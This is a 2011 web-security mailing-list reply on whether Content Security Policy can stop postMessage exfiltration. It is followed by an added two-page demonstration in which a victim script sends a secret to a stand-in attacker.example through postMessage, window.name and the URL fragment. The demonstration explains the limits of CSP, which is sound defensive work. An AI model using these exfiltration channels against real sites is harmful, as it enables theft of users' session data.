
Re: CSP and PostMessage?

From: Michal Zalewski <lcamtuf@coredump.cx>
Date: Mon, 19 Dec 2011 01:17:58 -0800
Message-ID: <CALx_OUCYq=pPhnLQK8MoeELrn+90G-Oi=FoZ_zV6Vh2gn62Zhg@mail.gmail.com>
To: gaz Heyes <gazheyes@gmail.com>
Cc: Daniel Veditz <dveditz@mozilla.com>, Devdatta Akhawe <dev.akhawe@gmail.com>, public-web-security@w3.org

> There is no way to prevent an outgoing request; you can check the incoming
> request and ensure it was from the domain you intended, but an attacker
> controlled postMessage request can be sent to any external domain, so I think
> it would be useful to have control over it in CSP.

I suspect that it's not the focus of CSP to prevent scripts already
running on the page from talking to cooperating scripts in other
origins?

If the goal of CSP is to prevent post-script-execution data
exfiltration, then I'm not sure how that could be attained without
making some sweeping changes. I can just as well use location.hash,
window.name, or a plethora of other client-side channels.

/mz
Received on Monday, 19 December 2011 09:18:56 GMT
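The channels named in the exchange above, as an added example that is not part of the original thread: a victim page under a strict CSP (`default-src 'none'` refuses fetch/XHR/WebSocket/beacon to other origins) still hands its data to a cooperating attacker window through postMessage, window.name and the URL fragment, because no CSP directive governs any of those. The origins `attacker.example` and `victim.example`, the nonce `d3m0`, the file names and the "secret" are all made up for the example; the attacker page is assumed to have opened the victim with window.open so that the victim has an opener.

```html
<!-- attacker.html, served from https://attacker.example (hypothetical origin).
     No CSP here: the attacker controls this document. -->
<!doctype html>
<title>Collector (added example)</title>
<pre id="out"></pre>
<script>
  // Record whatever arrives, tagged with the channel it came through.
  function log(channel, data) {
    document.getElementById('out').textContent += channel + ': ' + data + '\n';
  }

  // Channel 1: postMessage from the victim window. The only check that exists
  // is this receiving-side origin check; nothing on the sending side, CSP
  // included, prevents the victim from posting to us.
  window.addEventListener('message', function (e) {
    if (e.origin === 'https://victim.example') log('postMessage', e.data);
  });

  // Channels 2 and 3: the victim navigates its own window here. The payload is
  // in the fragment or in window.name; both survive a cross-origin navigation
  // (window.name does so in current browsers when the window has an opener).
  if (location.hash.length > 1) log('location.hash', decodeURIComponent(location.hash.slice(1)));
  if (window.name && window.name !== 'victim') log('window.name', window.name);

  // Open the victim by name so that window.opener in the victim points at us.
  function openVictim() { window.open('https://victim.example/victim.html', 'victim'); }
</script>
<button onclick="openVictim()">open victim</button>

<!-- victim.html, served from https://victim.example. The same policy would
     normally be sent as a Content-Security-Policy response header; a meta tag
     is used here only to keep the example in one file. -->
<!doctype html>
<meta http-equiv="Content-Security-Policy" content="default-src 'none'; script-src 'nonce-d3m0'">
<title>Victim (added example)</title>
<script nonce="d3m0">
  // Stand-in for data an already-running (e.g. injected) script has obtained.
  var secret = 'session=constructed-example-token';   // constructed value

  // Blocked: connect-src falls back to default-src 'none', so the request
  // is refused before it leaves the page.
  fetch('https://attacker.example/collect?d=' + encodeURIComponent(secret))
    .catch(function () { console.log('fetch refused by CSP, as expected'); });

  // Not blocked: postMessage to the cooperating window that opened us.
  if (window.opener) {
    window.opener.postMessage(secret, 'https://attacker.example');
  }

  // Not blocked: window.name is carried along when this window navigates.
  window.name = secret;

  // Not blocked: CSP does not restrict where the top-level document may go,
  // and the fragment rides along with the navigation.
  location = 'https://attacker.example/attacker.html#' + encodeURIComponent(secret);
</script>
```

Serve the two files from two origins, load the attacker page, press the button, and the collector shows the same value arriving three times while the browser console reports the refused fetch. That is the asymmetry the thread is about: CSP constrains where the page may load resources from and send network requests to, not what a script that is already executing may say to another window that is listening.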